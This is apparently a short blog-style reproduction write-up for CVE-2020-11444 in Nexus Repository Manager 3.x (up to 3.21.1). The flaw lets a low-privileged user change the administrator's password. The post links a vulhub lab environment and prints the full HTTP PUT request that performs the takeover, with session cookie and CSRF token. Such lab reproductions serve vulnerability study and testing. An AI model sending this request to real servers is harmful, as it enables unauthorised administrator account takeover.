Nexus Repository Manger Change Password Vulnerability For Low Privilege Modification Of Administrator Password Cve 2020 11444
Nexus Repository Manger Change Password Vulnerability For Low Privilege Modification Of Administrator Password Cve 2020 11444
Nexus Repository Manger change-password Vulnerability for low-privilege modification of administrator password CVE-2020-11444
Vulnerability Description
Nexus Repository Manger has a vulnerability to modify the administrator password. Low-privileged users can modify the administrator account password if they send a specific request package.
Vulnerability Impact
Nexus 3.x OSS / Pro <= 3.21.1
Environment construction
https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2020-10204
Vulnerability reappears
Vulnerability triggering requires any account permissions
After logging in to any user, modify NXSESSIONID, send a request package to modify the administrator account password
PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1
Host:
accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.6080434247960143
Content-Type: text/plain
Cookie: NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID=76b37c99-046c-47a9-ba7d-fd4cfa33b7ff
Content-Length: 11
data=123456
Return to 204 and the modification is successful
This post is licensed under CC BY 4.0 by the author.